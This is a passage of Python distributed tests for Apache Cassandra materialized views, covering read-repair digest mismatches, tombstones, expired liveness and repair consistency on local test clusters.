node2.start(wait_for_binary_proto=True)
logger.debug('Starting node3')
node3.start(wait_for_binary_proto=True)
# For k = 1 & a = 1, We should get a digest mismatch of tombstones and repaired
query = SimpleStatement("SELECT * FROM mv WHERE k = 1 AND a = 1", consistency_level=ConsistencyLevel.ALL)
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), True)
assert 0 == len(result.current_rows)
# For k = 1 & a = 1, second time no digest mismatch
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), False)
assert_none(session, "SELECT * FROM mv WHERE k = 1 AND a = 1")
assert 0 == len(result.current_rows)
# For k = 1 & a = 2, We should get a digest mismatch of data and repaired for a = 2
query = SimpleStatement("SELECT * FROM mv WHERE k = 1 AND a = 2", consistency_level=ConsistencyLevel.ALL)
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), True)
assert 1 == len(result.current_rows)
# For k = 1 & a = 2, second time no digest mismatch
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), False)
assert 1 == len(result.current_rows)
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv WHERE k = 1", [1, 2, 1, 20])
time.sleep(3)
# For k = 2 & a = 2, We should get a digest mismatch of expired and repaired
query = SimpleStatement("SELECT * FROM mv WHERE k = 2 AND a = 2", consistency_level=ConsistencyLevel.ALL)
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), True)
logger.debug(result.current_rows)
assert 0 == len(result.current_rows)
# For k = 2 & a = 2, second time no digest mismatch
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), False)
assert 0 == len(result.current_rows)
@since('3.0')
def test_expired_liveness_with_limit_rf1_nodes1(self):
self._test_expired_liveness_with_limit(rf=1, nodes=1)
@since('3.0')
def test_expired_liveness_with_limit_rf1_nodes3(self):
self._test_expired_liveness_with_limit(rf=1, nodes=3)
@since('3.0')
def test_expired_liveness_with_limit_rf3(self):
self._test_expired_liveness_with_limit(rf=3, nodes=3)
def _test_expired_liveness_with_limit(self, rf, nodes):
"""
Test MV with expired liveness limit is properly handled
@jira_ticket CASSANDRA-13883
"""
session = self.prepare(rf=rf, nodes=nodes, options={'hinted_handoff_enabled': False}, consistency_level=ConsistencyLevel.QUORUM)
node1 = self.cluster.nodelist()[0]
session.execute('USE ks')
session.execute("CREATE TABLE t (k int PRIMARY KEY, a int, b int)")
session.execute(("CREATE MATERIALIZED VIEW mv AS SELECT * FROM t "
"WHERE k IS NOT NULL AND a IS NOT NULL PRIMARY KEY (k, a)"))
session.cluster.control_connection.wait_for_schema_agreement()
for k in range(100):
session.execute("INSERT INTO t (k, a, b) VALUES ({}, {}, {})".format(k, k, k))
# generate view row with expired liveness except for row 50 and 99
for k in range(100):
if k == 50 or k == 99:
continue
session.execute("DELETE a FROM t where k = {};".format(k))
# there should be 2 live data
assert_one(session, "SELECT k,a,b FROM mv limit 1", [50, 50, 50])
assert_all(session, "SELECT k,a,b FROM mv limit 2", [[50, 50, 50], [99, 99, 99]])
assert_all(session, "SELECT k,a,b FROM mv", [[50, 50, 50], [99, 99, 99]])
# verify IN
keys = range(100)
assert_one(session, "SELECT k,a,b FROM mv WHERE k in ({}) limit 1".format(', '.join(str(x) for x in keys)),
[50, 50, 50])
assert_all(session, "SELECT k,a,b FROM mv WHERE k in ({}) limit 2".format(', '.join(str(x) for x in keys)),
[[50, 50, 50], [99, 99, 99]])
assert_all(session, "SELECT k,a,b FROM mv WHERE k in ({})".format(', '.join(str(x) for x in keys)),
[[50, 50, 50], [99, 99, 99]])
# verify fetch size
session.default_fetch_size = 1
assert_one(session, "SELECT k,a,b FROM mv limit 1", [50, 50, 50])
assert_all(session, "SELECT k,a,b FROM mv limit 2", [[50, 50, 50], [99, 99, 99]])
assert_all(session, "SELECT k,a,b FROM mv", [[50, 50, 50], [99, 99, 99]])
@since('3.0')
def test_base_column_in_view_pk_commutative_tombstone_with_flush(self):
self._test_base_column_in_view_pk_commutative_tombstone_(flush=True)
@since('3.0')
def test_base_column_in_view_pk_commutative_tombstone_without_flush(self):
self._test_base_column_in_view_pk_commutative_tombstone_(flush=False)
def _test_base_column_in_view_pk_commutative_tombstone_(self, flush):
"""
view row deletion should be commutative with newer view livenessInfo, otherwise deleted columns may be resurrected.
@jira_ticket CASSANDRA-13409
"""
session = self.prepare(rf=3, nodes=3, options={'hinted_handoff_enabled': False}, consistency_level=ConsistencyLevel.QUORUM)
node1 = self.cluster.nodelist()[0]
session.execute('USE ks')
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v,id)"))
session.cluster.control_connection.wait_for_schema_agreement()
for node in self.cluster.nodelist():
node.nodetool("disableautocompaction")
# sstable 1, Set initial values TS=1
self.update_view(session, "INSERT INTO t (id, v, v2, v3) VALUES (1, 1, 'a', 3.0) USING TIMESTAMP 1", flush)
assert_one(session, "SELECT * FROM t_by_v", [1, 1, 'a', 3.0])
# sstable 2, change v's value and TS=2, tombstones v=1 and adds v=0 record
self.update_view(session, "DELETE FROM t USING TIMESTAMP 2 WHERE id = 1;", flush)
assert_none(session, "SELECT * FROM t_by_v")
assert_none(session, "SELECT * FROM t")
# sstable 3, tombstones of mv created by base deletion should remain.
self.update_view(session, "INSERT INTO t (id, v) VALUES (1, 1) USING TIMESTAMP 3", flush)
assert_one(session, "SELECT * FROM t_by_v", [1, 1, None, None])
assert_one(session, "SELECT * FROM t", [1, 1, None, None])
# sstable 4, shadow view row (id=1, v=1), insert (id=1, v=2, ts=4)
self.update_view(session, "UPDATE t USING TIMESTAMP 4 set v = 2 WHERE id = 1;", flush)
assert_one(session, "SELECT * FROM t_by_v", [2, 1, None, None])
assert_one(session, "SELECT * FROM t", [1, 2, None, None])
# sstable 5, shadow view row (id=1, v=2), insert (id=1, v=1 ts=5)
self.update_view(session, "UPDATE t USING TIMESTAMP 5 set v = 1 WHERE id = 1;", flush)
assert_one(session, "SELECT * FROM t_by_v", [1, 1, None, None])
assert_one(session, "SELECT * FROM t", [1, 1, None, None]) # data deleted by row-tombstone@2 should not resurrect
if flush:
self.cluster.compact()
assert_one(session, "SELECT * FROM t_by_v", [1, 1, None, None])
assert_one(session, "SELECT * FROM t", [1, 1, None, None]) # data deleted by row-tombstone@2 should not resurrect
# shadow view row (id=1, v=1)
self.update_view(session, "UPDATE t USING TIMESTAMP 5 set v = null WHERE id = 1;", flush)
assert_none(session, "SELECT * FROM t_by_v")
assert_one(session, "SELECT * FROM t", [1, None, None, None])
def test_view_tombstone(self):
"""
Test that a materialized views properly tombstone
@jira_ticket CASSANDRA-10261
@jira_ticket CASSANDRA-10910
"""
self.prepare(rf=3, options={'hinted_handoff_enabled': False})
node1, node2, node3 = self.cluster.nodelist()
session = self.patient_exclusive_cql_connection(node1)
session.max_trace_wait = 120
session.execute('USE ks')
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v,id)"))
session.cluster.control_connection.wait_for_schema_agreement()
# Set initial values TS=0, verify
session.execute(SimpleStatement("INSERT INTO t (id, v, v2, v3) VALUES (1, 1, 'a', 3.0) USING TIMESTAMP 0",
consistency_level=ConsistencyLevel.ALL))
self._replay_batchlogs()
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = 1",
[1, 1, 'a', 3.0]
)
session.execute(SimpleStatement("INSERT INTO t (id, v2) VALUES (1, 'b') USING TIMESTAMP 1",
consistency_level=ConsistencyLevel.ALL))
self._replay_batchlogs()
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = 1",
[1, 1, 'b', 3.0]
)
# change v's value and TS=3, tombstones v=1 and adds v=0 record
session.execute(SimpleStatement("UPDATE t USING TIMESTAMP 3 SET v = 0 WHERE id = 1",
consistency_level=ConsistencyLevel.ALL))
self._replay_batchlogs()
assert_none(session, "SELECT * FROM t_by_v WHERE v = 1")
logger.debug('Shutdown node2')
node2.stop(wait_other_notice=True)
session.execute(SimpleStatement("UPDATE t USING TIMESTAMP 4 SET v = 1 WHERE id = 1",
consistency_level=ConsistencyLevel.QUORUM))
self._replay_batchlogs()
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = 1",
[1, 1, 'b', 3.0]
)
node2.start(wait_for_binary_proto=True)
# We should get a digest mismatch
query = SimpleStatement("SELECT * FROM t_by_v WHERE v = 1",
consistency_level=ConsistencyLevel.ALL)
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), True)
# We should not get a digest mismatch the second time
query = SimpleStatement("SELECT * FROM t_by_v WHERE v = 1", consistency_level=ConsistencyLevel.ALL)
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), False)
# Verify values one last time
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = 1",
[1, 1, 'b', 3.0],
cl=ConsistencyLevel.ALL
)
def check_trace_events(self, trace, expect_digest):
# we should see multiple requests get enqueued prior to index scan
# execution happening
# Look for messages like:
# 4.0+ Digest mismatch: Mismatch for key DecoratedKey
# <4.0 Digest mismatch: org.apache.cassandra.service.DigestMismatchException: Mismatch for key DecoratedKey
regex = r"Digest mismatch: ([a-zA-Z.]+:\s)?Mismatch for key DecoratedKey"
for event in trace.events:
desc = event.description
match = re.match(regex, desc)
if match:
if expect_digest:
break
else:
self.fail("Encountered digest mismatch when we shouldn't")
else:
if expect_digest:
self.fail("Didn't find digest mismatch")
def test_simple_repair_by_base(self):
self._simple_repair_test(repair_base=True)
def test_simple_repair_by_view(self):
self._simple_repair_test(repair_view=True)
def _simple_repair_test(self, repair_base=False, repair_view=False):
"""
Test that a materialized view are consistent after a simple repair.
"""
session = self.prepare(rf=3, options={'hinted_handoff_enabled': False})
node1, node2, node3 = self.cluster.nodelist()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
session.cluster.control_connection.wait_for_schema_agreement()
logger.debug('Shutdown node2')
node2.stop(wait_other_notice=True)
for i in range(1000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))
self._replay_batchlogs()
logger.debug('Verify the data in the MV with CL=ONE')
for i in range(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
logger.debug('Verify the data in the MV with CL=ALL. All should be unavailable.')
for i in range(1000):
statement = SimpleStatement(
"SELECT * FROM t_by_v WHERE v = {}".format(i),
consistency_level=ConsistencyLevel.ALL
)
assert_unavailable(
session.execute,
statement
)
logger.debug('Start node2, and repair')
node2.start(wait_for_binary_proto=True)
if repair_base:
node1.nodetool("repair ks t")
if repair_view:
node1.nodetool("repair ks t_by_v")
logger.debug('Verify the data in the MV with CL=ALL. All should be available now and no digest mismatch')
for i in range(1000):
query = SimpleStatement(
"SELECT * FROM t_by_v WHERE v = {}".format(i),
consistency_level=ConsistencyLevel.ALL
)
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), False)
assert self._rows_to_list(result.current_rows), [[i, i, 'a' == 3.0]]
def test_base_replica_repair(self):
self._base_replica_repair_test()
def test_base_replica_repair_with_contention(self):
"""
Test repair does not fail when there is MV lock contention
@jira_ticket CASSANDRA-12905
"""
self._base_replica_repair_test(fail_mv_lock=True)
def _base_replica_repair_test(self, fail_mv_lock=False):
"""
Test that a materialized view are consistent after the repair of the base replica.
"""
self.prepare(rf=3)
node1, node2, node3 = self.cluster.nodelist()
session = self.patient_exclusive_cql_connection(node1)
session.execute('USE ks')
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
session.cluster.control_connection.wait_for_schema_agreement()
logger.debug('Write initial data')
for i in range(1000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))
self._replay_batchlogs()
logger.debug('Verify the data in the MV with CL=ALL')
for i in range(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0],
cl=ConsistencyLevel.ALL
)
logger.debug('Shutdown node1')
node1.stop(wait_other_notice=True)
logger.debug('Delete node1 data')
node1.clear(clear_all=True)
jvm_args = []
if fail_mv_lock:
if self.cluster.version() >= LooseVersion('3.10'): # CASSANDRA-10134
jvm_args = ['-Dcassandra.allow_unsafe_replace=true', '-Dcassandra.replace_address={}'.format(node1.address())]
jvm_args.append("-Dcassandra.test.fail_mv_locks_count=1000")
# this should not make Keyspace.apply throw WTE on failure to acquire lock
node1.set_configuration_options(values={'write_request_timeout_in_ms': 100})
logger.debug('Restarting node1 with jvm_args={}'.format(jvm_args))
node1.start(wait_for_binary_proto=True, jvm_args=jvm_args)
logger.debug('Shutdown node2 and node3')
node2.stop(wait_other_notice=True)
node3.stop(wait_other_notice=True)
session = self.patient_exclusive_cql_connection(node1)
session.execute('USE ks')
logger.debug('Verify that there is no data on node1')
for i in range(1000):
assert_none(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i)
)
logger.debug('Restarting node2 and node3')
node2.start(wait_for_binary_proto=True)
node3.start(wait_for_binary_proto=True)
# Just repair the base replica
logger.debug('Starting repair on node1')
node1.nodetool("repair ks t")
logger.debug('Verify data with cl=ALL')
for i in range(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
@pytest.mark.resource_intensive
def test_complex_repair(self):
"""
Test that a materialized view are consistent after a more complex repair.
"""
session = self.prepare(rf=5, options={'hinted_handoff_enabled': False}, nodes=5)
node1, node2, node3, node4, node5 = self.cluster.nodelist()
# we create the base table with gc_grace_seconds=5 so batchlog will expire after 5 seconds
session.execute("CREATE TABLE ks.t (id int PRIMARY KEY, v int, v2 text, v3 decimal)"
"WITH gc_grace_seconds = 5")
session.execute(("CREATE MATERIALIZED VIEW ks.t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
session.cluster.control_connection.wait_for_schema_agreement()
logger.debug('Shutdown node2 and node3')
node2.stop()
node3.stop(wait_other_notice=True)
logger.debug('Write initial data to node1 (will be replicated to node4 and node5)')
for i in range(1000):
session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))
logger.debug('Verify the data in the MV on node1 with CL=ONE')
for i in range(1000):
assert_one(
session,
"SELECT * FROM ks.t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
logger.debug('Close connection to node1')
session.cluster.shutdown()
logger.debug('Shutdown node1, node4 and node5')
node1.stop()
node4.stop()
node5.stop()
logger.debug('Start nodes 2 and 3')
node2.start()
node3.start(wait_for_binary_proto=True)
session2 = self.patient_cql_connection(node2)
logger.debug('Verify the data in the MV on node2 with CL=ONE. No rows should be found.')
for i in range(1000):
assert_none(
session2,
"SELECT * FROM ks.t_by_v WHERE v = {}".format(i)
)
logger.debug('Write new data in node2 and node3 that overlap those in node1, node4 and node5')
for i in range(1000):
# we write i*2 as value, instead of i
session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i * 2))
logger.debug('Verify the new data in the MV on node2 with CL=ONE')
for i in range(1000):
v = i * 2
assert_one(
session2,
"SELECT * FROM ks.t_by_v WHERE v = {}".format(v),
[v, v, 'a', 3.0]
)
logger.debug('Wait for batchlogs to expire from node2 and node3')
time.sleep(5)
logger.debug('Start remaining nodes')
node1.start(wait_for_binary_proto=True)
node4.start(wait_for_binary_proto=True)
node5.start(wait_for_binary_proto=True)
session = self.patient_cql_connection(node1)
logger.debug('Read data from MV at QUORUM (old data should be returned)')
for i in range(1000):
assert_one(
session,
"SELECT * FROM ks.t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0],
cl=ConsistencyLevel.QUORUM
)
logger.debug('Run global repair on node1')
node1.repair()
logger.debug('Read data from MV at quorum (new data should be returned after repair)')
for i in range(1000):
v = i * 2
assert_one(
session,
"SELECT * FROM ks.t_by_v WHERE v = {}".format(v),
[v, v, 'a', 3.0],
cl=ConsistencyLevel.QUORUM
)
@pytest.mark.resource_intensive
def test_throttled_partition_update(self):
"""
@jira_ticket: CASSANDRA-13299, test break up large partition when repairing base with mv.
Provide a configuable batch size(cassandra.mv.mutation.row.count=100) to trottle number
of rows to be applied in one mutation
"""
session = self.prepare(rf=5, options={'hinted_handoff_enabled': False}, nodes=5)
node1, node2, node3, node4, node5 = self.cluster.nodelist()
for node in self.cluster.nodelist():
node.nodetool("disableautocompaction")
session.execute("CREATE TABLE ks.t (pk int, ck1 int, ck2 int, v1 int, v2 int, PRIMARY KEY(pk, ck1, ck2))")
session.execute(("CREATE MATERIALIZED VIEW ks.t_by_v AS SELECT * FROM t "
"WHERE pk IS NOT NULL AND ck1 IS NOT NULL AND ck2 IS NOT NULL "
"PRIMARY KEY (pk, ck2, ck1)"))
session.cluster.control_connection.wait_for_schema_agreement()
logger.debug('Shutdown node2 and node3')
node2.stop(wait_other_notice=True)
node3.stop(wait_other_notice=True)
size = 50
range_deletion_ts = 30
partition_deletion_ts = 10
for ck1 in range(size):
for ck2 in range(size):
session.execute("INSERT INTO ks.t (pk, ck1, ck2, v1, v2)"
" VALUES (1, {}, {}, {}, {}) USING TIMESTAMP {}".format(ck1, ck2, ck1, ck2, ck1))
self._replay_batchlogs()
for ck1 in range(size):
for ck2 in range(size):
assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t WHERE pk=1 AND ck1={} AND ck2={}".format(ck1, ck2),
[1, ck1, ck2, ck1, ck2])
assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t_by_v WHERE pk=1 AND ck1={} AND ck2={}".format(ck1, ck2),
[1, ck1, ck2, ck1, ck2])
logger.debug('Shutdown node4 and node5')
node4.stop(wait_other_notice=True)
node5.stop(wait_other_notice=True)
for ck1 in range(size):
for ck2 in range(size):
if ck1 % 2 == 0: # range tombstone
session.execute("DELETE FROM ks.t USING TIMESTAMP 50 WHERE pk=1 AND ck1={}".format(ck1))
elif ck1 == ck2: # row tombstone
session.execute("DELETE FROM ks.t USING TIMESTAMP 60 WHERE pk=1 AND ck1={} AND ck2={}".format(ck1, ck2))
elif ck1 == ck2 - 1: # cell tombstone
session.execute("DELETE v2 FROM ks.t USING TIMESTAMP 70 WHERE pk=1 AND ck1={} AND ck2={}".format(ck1, ck2))
# range deletion
session.execute("DELETE FROM ks.t USING TIMESTAMP {} WHERE pk=1 and ck1 < 30 and ck1 > 20".format(range_deletion_ts))
session.execute("DELETE FROM ks.t USING TIMESTAMP {} WHERE pk=1 and ck1 = 20 and ck2 < 10".format(range_deletion_ts))
# partition deletion for ck1 <= partition_deletion_ts
session.execute("DELETE FROM ks.t USING TIMESTAMP {} WHERE pk=1".format(partition_deletion_ts))
# only partition deletion for the pk=2000
session.execute("DELETE FROM ks.t USING TIMESTAMP {} WHERE pk=2000".format(partition_deletion_ts))
self._replay_batchlogs()
# start nodes with different batch size
logger.debug('Starting nodes')
node2.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.repair.mutation_repair_rows_per_batch={}".format(2)])
node3.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.repair.mutation_repair_rows_per_batch={}".format(5)])
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.repair.mutation_repair_rows_per_batch={}".format(50)])
node5.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.repair.mutation_repair_rows_per_batch={}".format(5000)])
self._replay_batchlogs()
logger.debug('repairing base table')
node1.nodetool("repair ks t")
# insert data to the deleted partition with pk=2000, they should be considered dead
session.execute("INSERT INTO ks.t (pk, ck1, ck2, v1, v2)"
" VALUES (2000, 0, 0, 0, 0) USING TIMESTAMP {}".format(partition_deletion_ts - 1))
self._replay_batchlogs()
logger.debug('stop cluster')
self.cluster.stop()
logger.debug('rolling restart to check repaired data on each node')
for node in self.cluster.nodelist():
logger.debug('starting {}'.format(node.name))
node.start(wait_for_binary_proto=True)
session = self.patient_cql_connection(node, consistency_level=ConsistencyLevel.ONE)
for ck1 in range(size):
for ck2 in range(size):
if (
ck1 <= partition_deletion_ts or # partition deletion
ck1 == ck2 or ck1 % 2 == 0 or # row deletion or range tombstone
(ck1 > 20 and ck1 < 30) or (ck1 == 20 and ck2 < 10) # range tombstone
):
assert_none(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t_by_v WHERE pk=1 AND "
"ck1={} AND ck2={}".format(ck1, ck2))
assert_none(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t WHERE pk=1 AND "
"ck1={} AND ck2={}".format(ck1, ck2))
elif ck1 == ck2 - 1: # cell tombstone
assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t_by_v WHERE pk=1 AND "
"ck1={} AND ck2={}".format(ck1, ck2), [1, ck1, ck2, ck1, None])
assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t WHERE pk=1 AND "
"ck1={} AND ck2={}".format(ck1, ck2), [1, ck1, ck2, ck1, None])
else:
assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t_by_v WHERE pk=1 AND "
"ck1={} AND ck2={}".format(ck1, ck2), [1, ck1, ck2, ck1, ck2])
assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t WHERE pk=1 AND "
"ck1={} AND ck2={}".format(ck1, ck2), [1, ck1, ck2, ck1, ck2])
# Verify partition deletion with pk=2000 has no live data
assert_none(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t WHERE pk=2000")
assert_none(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t_by_v WHERE pk=2000")
logger.debug('stopping {}'.format(node.name))
node.stop(wait_other_notice=True, wait_for_binary_proto=True)
@pytest.mark.resource_intensive
def test_really_complex_repair(self):
"""
Test that a materialized view are consistent after a more complex repair.
"""
session = self.prepare(rf=5, options={'hinted_handoff_enabled': False}, nodes=5)
node1, node2, node3, node4, node5 = self.cluster.nodelist()
# we create the base table with gc_grace_seconds=5 so batchlog will expire after 5 seconds
session.execute("CREATE TABLE ks.t (id int, v int, v2 text, v3 decimal, PRIMARY KEY(id, v, v2))"
"WITH gc_grace_seconds = 1")
session.execute(("CREATE MATERIALIZED VIEW ks.t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL AND v IS NOT NULL AND "
"v2 IS NOT NULL PRIMARY KEY (v2, v, id)"))
session.cluster.control_connection.wait_for_schema_agreement()
logger.debug('Shutdown node2 and node3')
node2.stop(wait_other_notice=True)
node3.stop(wait_other_notice=True)
session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'a', 3.0)")
session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'a', 3.0)")
self._replay_batchlogs()
logger.debug('Verify the data in the MV on node1 with CL=ONE')
assert_all(session, "SELECT * FROM ks.t_by_v WHERE v2 = 'a'", [['a', 1, 1, 3.0], ['a', 2, 2, 3.0]])
session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'b', 3.0)")
session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'b', 3.0)")
self._replay_batchlogs()
logger.debug('Verify the data in the MV on node1 with CL=ONE')
assert_all(session, "SELECT * FROM ks.t_by_v WHERE v2 = 'b'", [['b', 1, 1, 3.0], ['b', 2, 2, 3.0]])
session.shutdown()
logger.debug('Shutdown node1, node4 and node5')
node1.stop()
node4.stop()
node5.stop()
logger.debug('Start nodes 2 and 3')
node2.start()
node3.start(wait_for_binary_proto=True)
session2 = self.patient_cql_connection(node2)
session2.execute('USE ks')
logger.debug('Verify the data in the MV on node2 with CL=ONE. No rows should be found.')
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'a'")
logger.debug('Write new data in node2 that overlap those in node1')
session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'c', 3.0)")
session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'c', 3.0)")
self._replay_batchlogs()
assert_all(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'c'", [['c', 1, 1, 3.0], ['c', 2, 2, 3.0]])
session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'd', 3.0)")
session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'd', 3.0)")
self._replay_batchlogs()
assert_all(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'd'", [['d', 1, 1, 3.0], ['d', 2, 2, 3.0]])
logger.debug("Composite delete of everything")
session2.execute("DELETE FROM ks.t WHERE id = 1 and v = 1")
session2.execute("DELETE FROM ks.t WHERE id = 2 and v = 2")
self._replay_batchlogs()
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'c'")
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'd'")
logger.debug('Wait for batchlogs to expire from node2 and node3')
time.sleep(5)
logger.debug('Start remaining nodes')
node1.start(wait_for_binary_proto=True)
node4.start(wait_for_binary_proto=True)
node5.start(wait_for_binary_proto=True)
# at this point the data isn't repaired so we have an inconsistency.
# this value should return None
assert_all(
session2,
"SELECT * FROM ks.t_by_v WHERE v2 = 'a'", [['a', 1, 1, 3.0], ['a', 2, 2, 3.0]],
cl=ConsistencyLevel.QUORUM
)
logger.debug('Run global repair on node1')
node1.repair()
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'a'", cl=ConsistencyLevel.QUORUM)
def test_complex_mv_select_statements(self):
"""
Test complex MV select statements
@jira_ticket CASSANDRA-9664
"""
cluster = self.cluster
cluster.set_configuration_options({'enable_materialized_views': 'true'})
cluster.populate(3).start()
node1 = cluster.nodelist()[0]
session = self.patient_cql_connection(node1, consistency_level=ConsistencyLevel.QUORUM)
logger.debug("Creating keyspace")
session.execute("CREATE KEYSPACE mvtest WITH replication = "
"{'class': 'SimpleStrategy', 'replication_factor': '3'}")
session.execute('USE mvtest')
mv_primary_keys = ["((a, b), c)",
"((b, a), c)",
"(a, b, c)",
"(c, b, a)",
"((c, a), b)"]
for mv_primary_key in mv_primary_keys:
session.execute("CREATE TABLE test (a int, b int, c int, d int, PRIMARY KEY (a, b, c))")
insert_stmt = session.prepare("INSERT INTO test (a, b, c, d) VALUES (?, ?, ?, ?)")
update_stmt = session.prepare("UPDATE test SET d = ? WHERE a = ? AND b = ? AND c = ?")
delete_stmt1 = session.prepare("DELETE FROM test WHERE a = ? AND b = ? AND c = ?")
delete_stmt2 = session.prepare("DELETE FROM test WHERE a = ?")
session.cluster.control_connection.wait_for_schema_agreement()
rows = [(0, 0, 0, 0),
(0, 0, 1, 0),
(0, 1, 0, 0),
(0, 1, 1, 0),
(1, 0, 0, 0),
(1, 0, 1, 0),
(1, 1, -1, 0),
(1, 1, 0, 0),
(1, 1, 1, 0)]
for row in rows:
session.execute(insert_stmt, row)
logger.debug("Testing MV primary key: {}".format(mv_primary_key))
session.execute("CREATE MATERIALIZED VIEW mv AS SELECT * FROM test WHERE "
"a = 1 AND b IS NOT NULL AND c = 1 PRIMARY KEY {}".format(mv_primary_key))
time.sleep(3)
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# insert new rows that does not match the filter
session.execute(insert_stmt, (0, 0, 1, 0))
session.execute(insert_stmt, (1, 1, 0, 0))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# insert new row that does match the filter
session.execute(insert_stmt, (1, 2, 1, 0))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 0], [1, 2, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# update rows that does not match the filter
session.execute(update_stmt, (1, 1, -1, 0))
session.execute(update_stmt, (0, 1, 1, 0))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 0], [1, 2, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# update a row that does match the filter
session.execute(update_stmt, (2, 1, 1, 1))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 2], [1, 2, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# delete rows that does not match the filter
session.execute(delete_stmt1, (1, 1, -1))
session.execute(delete_stmt1, (2, 0, 1))
session.execute(delete_stmt2, (0,))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 2], [1, 2, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# delete a row that does match the filter
session.execute(delete_stmt1, (1, 1, 1))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 2, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# delete a partition that matches the filter
session.execute(delete_stmt2, (1,))
